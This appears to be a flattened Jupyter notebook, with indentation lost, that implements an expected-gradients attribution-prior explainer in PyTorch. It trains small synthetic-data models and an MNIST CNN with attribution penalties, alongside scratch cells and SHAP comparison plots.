torch.nn.functional.one_hot??
eg_standardized[0].std()
eg[0].mean()
eg[0].std()
np.sqrt()
```
# AttributionPriorExplainer
```
"""
https://github.com/suinleelab/attributionpriors/blob/master/attributionpriors/pytorch_ops.py
https://github.com/slundberg/shap/blob/master/shap/explainers/_gradient.py
Currently, in the case of one-hot encoded class output, ignore attribution for output indices that are not true.
"""
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader
class AttributionPriorExplainer():
def __init__(self, reference_dataset, input_index, batch_size, k):
self.reference_dataloader=DataLoader(dataset=reference_dataset,
batch_size=batch_size*k,
shuffle=True,
drop_last=True)
self.reference_dataloader_iterator=iter(self.reference_dataloader)
self.batch_size=batch_size
self.k=k
self.input_index=input_index
def get_reference_data(self):
try:
reference_data=next(self.reference_dataloader_iterator)
except:
self.reference_dataloader_iterator=iter(self.reference_dataloader)
reference_data=next(self.reference_dataloader_iterator)
if self.input_index is None:
return reference_data
else:
return reference_data[self.input_index]
def interpolate_input_reference(self, input_data, reference_data):
alpha=torch.empty(self.batch_size, self.k).uniform_(0,1).to(input_data.device)
alpha=alpha.view(*([self.batch_size, self.k,]+[1]*len(input_data.shape[1:])))
input_reference_interpolated=(1-alpha)*reference_data+(alpha)*input_data.unsqueeze(1)
return input_reference_interpolated
def diff_input_reference(self, input_data, reference_data):
return input_data.unsqueeze(1)-reference_data
def get_grad(self, model, input_reference_interpolated, valid_output):
input_reference_interpolated.requires_grad=True
input_reference_interpolated_grad=torch.zeros(input_reference_interpolated.shape).float().to(input_reference_interpolated.device)
for i in range(self.k):
batch_input=input_reference_interpolated[:,i,]
batch_output=model(batch_input)
if valid_output is None:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
else:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=valid_output,
create_graph=True)[0]
input_reference_interpolated_grad[:,i,]=grad_out
return input_reference_interpolated_grad
def attribution(self, model, input_data, valid_output=None):
model_dtype=next(model.parameters()).dtype
reference_data=self.get_reference_data().to(model_dtype).to(input_data.device)
assert input_data.dtype==model_dtype
assert input_data.shape[0]==self.batch_size
assert input_data.shape[1:]==reference_data.shape[1:]
assert input_data.device==next(model.parameters()).device
reference_data=reference_data.view(self.batch_size, self.k, *reference_data.shape[1:])
input_reference_interpolated=self.interpolate_input_reference(input_data, reference_data)
input_reference_diff=self.diff_input_reference(input_data, reference_data)
input_reference_interpolated_grad=self.get_grad(model, input_reference_interpolated, valid_output)
diff_interpolated_grad=input_reference_diff*input_reference_interpolated_grad
expected_grad=diff_interpolated_grad.mean(axis=1)
return expected_grad
"""
if list(batch_output.shape[1:])==[1]:
# scalar output
else:
# vector output
if grad_output is None:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
else:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=grad_outputs.to(input_reference_interpolated.device),
create_graph=True)[0]
def gather_nd(self,params, indices):
max_value = functools.reduce(operator.mul, list(params.size())) - 1
indices = indices.t().long()
ndim = indices.size(0)
idx = torch.zeros_like(indices[0]).long()
m = 1
for i in range(ndim)[::-1]:
idx += indices[i]*m
m *= params.size(i)
idx[idx < 0] = 0
idx[idx > max_value] = 0
return torch.take(params, idx)
sample_indices=torch.arange(0,batch_output.size(0)).to(input_reference_interpolated.device)
indices_tensor=torch.cat([sample_indices.unsqueeze(1),
sparse_output.unsqueeze(1).to(input_reference_interpolated.device)],dim=1)
batch_output=self.gather_nd(batch_output, indices_tensor)
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
print('a',torch.ones_like(batch_output).to(input_reference_interpolated.device).shape)
print('equal',np.all((grad_out==grad_out2).cpu().numpy()))
"""
optimizer1.param_groups[0]['amsgrad']
optimizer2 = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler2 = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer2, gamma=0.95)
#scheduler1 = torch.optim.lr_scheduler.StepLR(optimizer1, step_size=5, gamma=0.5)
optimizer2.param_groups[0]['params'][-1]
len(optimizer1.param_groups)
scheduler1.get_last_lr()
scheduler1.step()
optimizer1.param_groups[0]['initial_lr']
optimizer1.param_groups[0]['lr']
test_dataset
device=torch.device('cuda')
convergence_list1_list_eg=[]
convergence_list2_list_eg=[]
convergence_list3_list_eg=[]
for k in [1,2,3,4,5]:
print('k =',k)
model=MLP().to(device)
with torch.no_grad():
model.layers[0].weight[0,0]=10
model.layers[0].weight[0,1]=10
model.layers[0].bias[0]=-6
x_zeros = torch.ones_like(x_train[:,:])
background_dataset = BinaryData(x_zeros)
explainer = AttributionPriorExplainer(background_dataset, 64, k=k)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)
bce_term = torch.nn.BCELoss()
train_loss_list_mean_list=[]
convergence_list1=[]
convergence_list2=[]
convergence_list3=[]
for epoch in range(200):
train_loss_list=[]
for i, (x, y_true) in enumerate(train_loader):
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
eg_abs_mean=eg.abs().mean(0)
loss=bce_term(y_pred, y_true.unsqueeze(1)) + eg_abs_mean[1]
loss.backward(retain_graph=True)
optimizer.step()
train_loss_list.append(loss.item())
train_loss_list_mean=np.mean(train_loss_list)
train_loss_list_mean_list.append(train_loss_list_mean)
convergence_list1.append(calculate_dependence(model)[0])
convergence_list2.append(calculate_dependence(model)[1])
convergence_list3.append(calculate_dependence(model)[2])
convergence_list1_list_eg.append(convergence_list1)
convergence_list2_list_eg.append(convergence_list2)
convergence_list3_list_eg.append(convergence_list3)
model(img),model(img).shape
model(img).shape
img.shape
train_dataloader=DataLoader(dataset=train_dataset, batch_size=10)
for img,label in train_dataloader:
print(img)
break
torch.nn.MaxPool2d(kernel_size=2, padding='valid')
torch.nn.MaxPool2d(kernel_size=2)
train_dataloader=DataLoader(dataset=train_dataset, batch_size=10)
loss_func=torch.nn.CrossEntropyLoss()
for images, labels_true in train_dataloader:
images=images
labels_pred=model.forward(images)
print(labels_pred.shape)
loss_func(labels_pred, labels_true)
import tensorflow as tf
image = tf.constant(np.arange(1, 24+1, dtype=np.int32), shape=[2,2, 2, 3])
new_image = tf.image.per_image_standardization(image)
np.var(new_image[0])
new_image
np.var(new_image)
torch.nn.Dropout?
import torch
torch.nn.Conv2d??
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3, 1)
self.dropout1 = nn.Dropout(0.25)
self.dropout2 = nn.Dropout(0.5)
self.fc1 = nn.Linear(9216, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = F.max_pool2d(x, 2)
x = self.dropout1(x)
x = torch.flatten(x, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
output = F.log_softmax(x, dim=1)
return output
def train(args, model, device, train_loader, optimizer, epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
if args.dry_run:
break
def test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset1 = datasets.MNIST('../data', train=True, download=True,
transform=transform)
dataset2 = datasets.MNIST('../data', train=False,
transform=transform)
model = Net()
train_loader = torch.utils.data.DataLoader(dataset1,batch_size=64)
test_loader = torch.utils.data.DataLoader(dataset2, batch_size=1000)
device=torch.device('cuda')
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
break
data.shape
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=14, metavar='N',
help='number of epochs to train (default: 14)')
parser.add_argument('--lr', type=float, default=1.0, metavar='LR',
help='learning rate (default: 1.0)')
parser.add_argument('--gamma', type=float, default=0.7, metavar='M',
help='Learning rate step gamma (default: 0.7)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--dry-run', action='store_true', default=False,
help='quickly check a single pass')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--save-model', action='store_true', default=False,
help='For Saving the current Model')
args = parser.parse_args()
use_cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
device = torch.device("cuda" if use_cuda else "cpu")
train_kwargs = {'batch_size': args.batch_size}
test_kwargs = {'batch_size': args.test_batch_size}
if use_cuda:
cuda_kwargs = {'num_workers': 1,
'pin_memory': True,
'shuffle': True}
train_kwargs.update(cuda_kwargs)
test_kwargs.update(cuda_kwargs)
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset1 = datasets.MNIST('../data', train=True, download=True,
transform=transform)
dataset2 = datasets.MNIST('../data', train=False,
transform=transform)
train_loader = torch.utils.data.DataLoader(dataset1,**train_kwargs)
test_loader = torch.utils.data.DataLoader(dataset2, **test_kwargs)
model = Net().to(device)
optimizer = optim.Adadelta(model.parameters(), lr=args.lr)
scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
for epoch in range(1, args.epochs + 1):
train(args, model, device, train_loader, optimizer, epoch)
test(model, device, test_loader)
scheduler.step()
if args.save_model:
torch.save(model.state_dict(), "mnist_cnn.pt")
```
# AttributionPriorExplainer
```
"""
https://github.com/suinleelab/attributionpriors/blob/master/attributionpriors/pytorch_ops.py
https://github.com/slundberg/shap/blob/master/shap/explainers/_gradient.py
"""
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader
class AttributionPriorExplainer():
def __init__(self, reference_dataset, batch_size, k):
self.reference_dataloader=DataLoader(dataset=reference_dataset,
batch_size=batch_size*k,
shuffle=True,
drop_last=True)
self.reference_dataloader_iterator=iter(self.reference_dataloader)
self.batch_size=batch_size
self.k=k
def get_reference_data(self):
try:
reference_data=next(self.reference_dataloader_iterator)
except:
self.reference_dataloader_iterator=iter(self.reference_dataloader)
reference_data=next(self.reference_dataloader_iterator)
return reference_data
def interpolate_input_reference(self, input_data, reference_data):
alpha=torch.empty(self.batch_size, self.k).uniform_(0,1).to(input_data.device)
alpha=alpha.view(*([self.batch_size, self.k,]+[1]*len(input_data.shape[1:])))
input_reference_interpolated=(1-alpha)*reference_data+(alpha)*input_data.unsqueeze(1)
return input_reference_interpolated
def diff_input_reference(self, input_data, reference_data):
return input_data.unsqueeze(1)-reference_data
def get_grad(self, model, input_reference_interpolated):
input_reference_interpolated.requires_grad=True
input_reference_interpolated_grad=torch.zeros(input_reference_interpolated.shape).float().to(input_reference_interpolated.device)
for i in range(self.k):
batch_input=input_reference_interpolated[:,i,]
batch_output=model(batch_input)
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
input_reference_interpolated_grad[:,i,]=grad_out
return input_reference_interpolated_grad
def attribution(self, model, input_data):
model_dtype=next(model.parameters()).dtype
reference_data=self.get_reference_data().to(model_dtype).to(input_data.device)
assert input_data.dtype==model_dtype
assert input_data.shape[0]==self.batch_size
assert input_data.shape[1:]==reference_data.shape[1:]
assert input_data.device==next(model.parameters()).device
reference_data=reference_data.view(self.batch_size, self.k, *reference_data.shape[1:])
input_reference_interpolated=self.interpolate_input_reference(input_data, reference_data)
input_reference_diff=self.diff_input_reference(input_data, reference_data)
input_reference_interpolated_grad=self.get_grad(model, input_reference_interpolated)
diff_interpolated_grad=input_reference_diff*input_reference_interpolated_grad
expected_grad=diff_interpolated_grad.mean(axis=1)
return expected_grad
ใ
```
|
github_jupyter
|
dir_of_file='MyDrive/Colab Notebooks/attributionpriors/examples'
from google.colab import drive
import os
drive.mount('./gdrive')
# Print the current working directory
print("Current working directory: {0}".format(os.getcwd()))
# Change the current working directory
os.chdir('./gdrive/'+dir_of_file)
# Print the current working directory
print("Current working directory: {0}".format(os.getcwd()))
import pkg_resources
if 'shap' not in [i.key for i in pkg_resources.working_set]:
!pip install shap
import sys
sys.path.insert(0, '../')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import altair as alt
import torch
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader, Subset
from torch.utils.data.dataset import random_split
import torchvision
from torchvision import transforms
import shap
class BinaryData(Dataset):
def __init__(self, X, y=None, transform=None):
self.X=X
self.y=y
self.transform=transform
def __len__(self):
return len(self.X)
def __getitem__(self, index):
sample=self.X[index,:]
if self.transform is not None:
sample=self.transform(sample)
if self.y is not None:
return sample, self.y[index]
else:
return sample
batch_size=64
a_train=torch.empty(1000,1).uniform_(0,1)
x_train=torch.bernoulli(a_train)
x_train=torch.cat([x_train,x_train],axis=1)
y_train=x_train[:,0]
train_dataset=BinaryData(x_train, y_train)
train_loader=DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True, drop_last=True)
#a_test=torch.empty(1000,2).uniform_(0,1)
#x_test=torch.bernoulli(a_test)
#y_test=x_test[:,0]
#test_dataset=BinaryData(x_test, y_test)
#test_loader=DataLoader(dataset=test_dataset, batch_size=64, shuffle=True, drop_last=True)
class MLP(torch.nn.Module):
def __init__(self):
super(MLP,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(2,1),
torch.nn.Sigmoid())
def forward(self,x):
x=self.layers(x)
return x
def calculate_dependence(model):
zero_arange=torch.tensor(np.concatenate([np.zeros(100).reshape(-1,1),
np.arange(0,1,0.01).reshape(-1,1)],axis=1)).float().to(device)
one_arange=torch.tensor(np.concatenate([np.ones(100).reshape(-1,1),
np.arange(0,1,0.01).reshape(-1,1)],axis=1)).float().to(device)
arange_zero=torch.tensor(np.concatenate([np.arange(0,1,0.01).reshape(-1,1),
np.zeros(100).reshape(-1,1)],axis=1)).float().to(device)
arange_one=torch.tensor(np.concatenate([np.arange(0,1,0.01).reshape(-1,1),
np.ones(100).reshape(-1,1)],axis=1)).float().to(device)
dep1=(model(one_arange)-model(zero_arange)).mean().detach().cpu().numpy().reshape(-1)[0]
dep2=(model(arange_one)-model(arange_zero)).mean().detach().cpu().numpy().reshape(-1)[0]
return dep2/dep1, dep1, dep2
device=torch.device('cuda')
convergence_list1_list_eg=[]
convergence_list2_list_eg=[]
convergence_list3_list_eg=[]
for k in [1,2,3,4,5]:
print('k =',k)
model=MLP().to(device)
with torch.no_grad():
model.layers[0].weight[0,0]=10
model.layers[0].weight[0,1]=10
model.layers[0].bias[0]=-6
x_zeros = torch.ones_like(x_train[:,:])
background_dataset = BinaryData(x_zeros)
explainer = AttributionPriorExplainer(background_dataset, None, 64, k=k)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)
bce_term = torch.nn.BCELoss()
train_loss_list_mean_list=[]
convergence_list1=[]
convergence_list2=[]
convergence_list3=[]
for epoch in range(200):
train_loss_list=[]
for i, (x, y_true) in enumerate(train_loader):
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
eg_abs_mean=eg.abs().mean(0)
loss=bce_term(y_pred, y_true.unsqueeze(1)) + eg_abs_mean[1]
loss.backward(retain_graph=True)
optimizer.step()
train_loss_list.append(loss.item())
train_loss_list_mean=np.mean(train_loss_list)
train_loss_list_mean_list.append(train_loss_list_mean)
convergence_list1.append(calculate_dependence(model)[0])
convergence_list2.append(calculate_dependence(model)[1])
convergence_list3.append(calculate_dependence(model)[2])
convergence_list1_list_eg.append(convergence_list1)
convergence_list2_list_eg.append(convergence_list2)
convergence_list3_list_eg.append(convergence_list3)
plt.figure(figsize=(6,6))
for k, convergence_list1 in enumerate(convergence_list1_list_eg):
plt.plot((np.arange(len(convergence_list1))+1), convergence_list1,label=k+1)
plt.xlim([40,75])
plt.ylim([-0.01,0.4])
plt.legend(title='k')
plt.xlabel('epochs')
plt.ylabel('fractional dependence on feature 2')
plt.show()
plt.figure(figsize=(6,6))
for k, convergence_list1 in enumerate(convergence_list1_list_eg):
plt.plot((np.arange(len(convergence_list1))+1)*(k+1), convergence_list1,label=k+1)
plt.xlim([0,350])
plt.ylim([-0.01,0.4])
plt.legend(title='k')
plt.xlabel('gradient calls per training example')
plt.ylabel('fractional dependence on feature 2')
plt.show()
feature_mean=0
feature_sigma=1
dummy_sigma=0.5
n_samples=1000
n_features=3
X=np.random.randn(n_samples,n_features)*feature_sigma+feature_mean
X[:,2]=X[:,0]+np.random.randn(n_samples)*dummy_sigma
output_mean=0
output_sigma=0.5
Y=X[:,0]-X[:,1]+np.random.randn(n_samples)*output_sigma+output_mean
Y=Y.reshape([Y.shape[0],1])
data = pd.DataFrame({'Feature 0': X[:, 0], 'Feature 1': X[:, 1], 'Feature 2': X[:, 2], 'Outcome': Y.squeeze()})
alt.Chart(data).mark_point(filled=True).encode(
x=alt.X(alt.repeat('column'), type='quantitative', scale=alt.Scale(domain=[-4, 4])),
y=alt.Y('Outcome:Q', scale=alt.Scale(domain=[-6, 6]))
).properties(
height=200,
width=200
).repeat(
column=['Feature 0', 'Feature 1', 'Feature 2']
).properties(
title='The relationship between the outcome and the three features in our simulated data'
).configure_axis(
labelFontSize=15,
labelFontWeight=alt.FontWeight('lighter'),
titleFontSize=15,
titleFontWeight=alt.FontWeight('normal')
).configure_title(
fontSize=18
)
class CustomDataset(Dataset):
def __init__(self, x, y=None):
self.x=x
self.y=y
def __len__(self):
return len(self.x)
def __getitem__(self, index):
if self.y is not None:
return self.x[index], self.y[index]
else:
return self.x[index]
batch_size=20
dataset=CustomDataset(x=X,y=Y)
train_dataset, test_dataset, valid_dataset=random_split(dataset, [int(n_samples*0.8), int(n_samples*0.1), int(n_samples*0.1)])
train_dataloader=DataLoader(dataset=train_dataset, batch_size=20, shuffle=True, drop_last=True)
test_dataloader=DataLoader(dataset=test_dataset, batch_size=len(test_dataset), shuffle=True, drop_last=True)
valid_dataloader=DataLoader(dataset=valid_dataset, batch_size=len(valid_dataset), shuffle=True, drop_last=True)
class MLP(torch.nn.Module):
def __init__(self):
super(MLP,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(2,1),
torch.nn.Sigmoid())
def forward(self,x):
x=self.layers(x)
return x
class CustomModel(torch.nn.Module):
def __init__(self):
super(CustomModel,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(n_features,5),
torch.nn.ReLU(),
torch.nn.Linear(5,1))
def forward(self, x):
return self.layers(x)
device=torch.device('cuda')
model=CustomModel().to(device)
explainer = AttributionPriorExplainer(train_dataset[:][0], None, batch_size=batch_size, k=1)
explainer_valid = AttributionPriorExplainer(valid_dataset[:][0], None, batch_size=100, k=1)
optimizer=torch.optim.SGD(model.parameters(), lr=1e-2, momentum=0, dampening=0)
loss_func = torch.nn.MSELoss()
batch_count=0
valid_loss_list=[]
step_list=[]
for epoch in range(15):
for i, (x, y_true) in enumerate(train_dataloader):
batch_count+=1
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
loss=loss_func(y_pred, y_true) + 30*(eg*eg)[:,2].mean()
loss.backward()
optimizer.step()
if batch_count%10==0:
valid_loss=[]
for i, (x, y_true) in enumerate(valid_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
valid_loss.append(loss.item())
eg=explainer_valid.attribution(model,x)
#print(eg.abs().mean(axis=0).detach().cpu())
valid_loss_list.append(np.mean(valid_loss))
step_list.append(batch_count)
test_loss=[]
for i, (x, y_true) in enumerate(test_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
test_loss.append(loss.item())
print('MSE:',np.mean(test_loss))
data = pd.DataFrame({
'Iteration': step_list,
'Validation Loss': valid_loss_list
})
alt.Chart(data
).mark_line().encode(alt.X('Iteration:Q'), alt.Y('Validation Loss:Q', scale=alt.Scale(domain=[0.0, 2.5])))
explainer=shap.GradientExplainer(model=model, data=torch.Tensor(X).to(device))
shap_values=explainer.shap_values(torch.Tensor(X).to(device), nsamples=200)
shap.summary_plot(shap_values, X)
explainer_temp = AttributionPriorExplainer(dataset, input_index=0, batch_size=5, k=200)
temp_dataloader=DataLoader(dataset=dataset, batch_size=5, shuffle=True, drop_last=True)
eg_list=[]
x_list=[]
for i, (x, y_true) in enumerate(temp_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
eg_temp=explainer_temp.attribution(model, x)
eg_list.append(eg_temp.detach().cpu().numpy())
x_list.append(x.detach().cpu().numpy())
eg_list_concat=np.concatenate(eg_list)
x_list_concat=np.concatenate(x_list)
shap.summary_plot(eg_list_concat, x_list_concat)
device=torch.device('cuda')
model=CustomModel().to(device)
explainer = AttributionPriorExplainer(train_dataset, input_index=0, batch_size=batch_size, k=1)
explainer_valid = AttributionPriorExplainer(valid_dataset, input_index=0, batch_size=100, k=1)
optimizer=torch.optim.SGD(model.parameters(), lr=1e-2, momentum=0, dampening=0)
loss_func = torch.nn.MSELoss()
batch_count=0
valid_loss_list=[]
step_list=[]
for epoch in range(15):
for i, (x, y_true) in enumerate(train_dataloader):
batch_count+=1
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
loss=loss_func(y_pred, y_true)# + 30*(eg*eg)[:,2].mean()
loss.backward()
optimizer.step()
if batch_count%10==0:
valid_loss=[]
for i, (x, y_true) in enumerate(valid_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
valid_loss.append(loss.item())
eg=explainer_valid.attribution(model,x)
#print(eg.abs().mean(axis=0).detach().cpu())
valid_loss_list.append(np.mean(valid_loss))
step_list.append(batch_count)
test_loss=[]
for i, (x, y_true) in enumerate(test_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
test_loss.append(loss.item())
print('MSE:',np.mean(test_loss))
data = pd.DataFrame({
'Iteration': step_list,
'Validation Loss': valid_loss_list
})
alt.Chart(data
).mark_line().encode(alt.X('Iteration:Q'), alt.Y('Validation Loss:Q', scale=alt.Scale(domain=[0.0, 2.5])))
explainer=shap.GradientExplainer(model=model, data=torch.Tensor(X).to(device))
shap_values=explainer.shap_values(torch.Tensor(X).to(device), nsamples=200)
shap.summary_plot(shap_values, X)
explainer_temp = AttributionPriorExplainer(dataset, input_index=0, batch_size=5, k=200)
temp_dataloader=DataLoader(dataset=dataset, batch_size=5, shuffle=True, drop_last=True)
eg_list=[]
x_list=[]
for i, (x, y_true) in enumerate(temp_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
eg_temp=explainer_temp.attribution(model, x)
eg_list.append(eg_temp.detach().cpu().numpy())
x_list.append(x.detach().cpu().numpy())
eg_list_concat=np.concatenate(eg_list)
x_list_concat=np.concatenate(x_list)
shap.summary_plot(eg_list_concat, x_list_concat)
batch_size=50
num_epochs=60
valid_size=5000
train_dataset=torchvision.datasets.MNIST('./data', train=True, download=True, transform=transforms.Compose([transforms.RandomRotation([-15,15], fill = (0,)),
transforms.RandomAffine(degrees=0, translate=(4/28,4/28), fillcolor=0),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
train_dataset=Subset(train_dataset,range(valid_size,len(train_dataset)))
valid_dataset=torchvision.datasets.MNIST('./data', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
valid_dataset=Subset(valid_dataset,range(valid_size))
test_dataset=torchvision.datasets.MNIST('./data', train=False, download=True, transform=transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
train_dataloader=DataLoader(train_dataset, shuffle=True, drop_last=True, batch_size=batch_size)
valid_dataloader=DataLoader(valid_dataset, shuffle=False, drop_last=True, batch_size=batch_size)
test_dataloader=DataLoader(test_dataset, shuffle=False, drop_last=True, batch_size=batch_size)
class MNISTModel(torch.nn.Module):
def __init__(self):
super(MNISTModel,self).__init__()
layer1_conv=torch.nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, padding=int((5-1)/2));torch.nn.init.xavier_uniform_(layer1_conv.weight);torch.nn.init.zeros_(layer1_conv.bias);
layer1_batchnorm=torch.nn.BatchNorm2d(num_features=32, momentum=0.1)
layer1_activation=torch.nn.ReLU()
layer1_maxpool=torch.nn.MaxPool2d(kernel_size=2, padding=0)
layer2_conv=torch.nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, padding=int((5-1)/2));torch.nn.init.xavier_uniform_(layer2_conv.weight);torch.nn.init.zeros_(layer2_conv.bias);
layer2_batchnorm=torch.nn.BatchNorm2d(num_features=64, momentum=0.1)
layer2_activation=torch.nn.ReLU()
layer2_maxpool=torch.nn.MaxPool2d(kernel_size=2, padding=0)
layer3_flatten=torch.nn.Flatten()
layer3_fc=torch.nn.Linear(3136,1024);torch.nn.init.xavier_uniform_(layer3_fc.weight);torch.nn.init.zeros_(layer3_fc.bias);
layer3_activation=torch.nn.ReLU()
layer3_dropout=torch.nn.Dropout(p=0.5)
layer4_fc=torch.nn.Linear(1024, 10)
self.layers=torch.nn.Sequential(layer1_conv, layer1_batchnorm, layer1_activation, layer1_maxpool,
layer2_conv, layer2_batchnorm, layer2_activation, layer2_maxpool,
layer3_flatten, layer3_fc, layer3_activation, layer3_dropout,
layer4_fc)
#print(dir(self.layers))
#print(self.layers._get_name())
def forward(self,x):
x=self.layers(x)
return x
device=torch.device('cuda')
model=MNISTModel().to(device)
len(train_dataset)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer, gamma=0.95)
#scheduler1 = torch.optim.lr_scheduler.StepLR(optimizer1, step_size=5, gamma=0.5)
"""
global_step=0
"""
lamb=0.5
explainer=AttributionPriorExplainer(reference_dataset=train_dataset, input_index=0, batch_size=batch_size, k=5)
loss_func=torch.nn.CrossEntropyLoss()
for epoch in range(60):
for i, (images, labels_true) in enumerate(train_dataloader):
images, labels_true = images.to(device), labels_true.to(device)
optimizer.zero_grad()
labels_onehot_pred=model(images)
labels_onehot_true=torch.nn.functional.one_hot(labels_true, num_classes=10)
eg=explainer.attribution(model, images, valid_output=labels_onehot_true)
eg_standardized=(eg-eg.mean(dim=(-1,-2,-3), keepdim=True))/\
(eg.std(dim=(-1,-2,-3),keepdim=True).clamp(max=1/np.sqrt(torch.numel(eg[0]))))
loss=loss_func(labels_onehot_pred, labels_true)
loss.backward(retain_graph=True)
optimizer.step()
"""
global_step+=1
if (global_step*50)%60000==0:
pass
"""
scheduler.step()
break
images.shape, labels_true.shape
eg_standardized=(eg-eg.mean(dim=(-1,-2,-3), keepdim=True))/\
(eg.std(dim=(-1,-2,-3),keepdim=True).clamp(max=1/np.sqrt(torch.numel(eg[0]))))
images.shape
torch.nn.functional.one_hot??
eg_standardized[0].std()
eg[0].mean()
eg[0].std()
np.sqrt()
"""
https://github.com/suinleelab/attributionpriors/blob/master/attributionpriors/pytorch_ops.py
https://github.com/slundberg/shap/blob/master/shap/explainers/_gradient.py
Currently, in the case of one-hot encoded class output, ignore attribution for output indices that are not true.
"""
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader
class AttributionPriorExplainer():
def __init__(self, reference_dataset, input_index, batch_size, k):
self.reference_dataloader=DataLoader(dataset=reference_dataset,
batch_size=batch_size*k,
shuffle=True,
drop_last=True)
self.reference_dataloader_iterator=iter(self.reference_dataloader)
self.batch_size=batch_size
self.k=k
self.input_index=input_index
def get_reference_data(self):
try:
reference_data=next(self.reference_dataloader_iterator)
except:
self.reference_dataloader_iterator=iter(self.reference_dataloader)
reference_data=next(self.reference_dataloader_iterator)
if self.input_index is None:
return reference_data
else:
return reference_data[self.input_index]
def interpolate_input_reference(self, input_data, reference_data):
alpha=torch.empty(self.batch_size, self.k).uniform_(0,1).to(input_data.device)
alpha=alpha.view(*([self.batch_size, self.k,]+[1]*len(input_data.shape[1:])))
input_reference_interpolated=(1-alpha)*reference_data+(alpha)*input_data.unsqueeze(1)
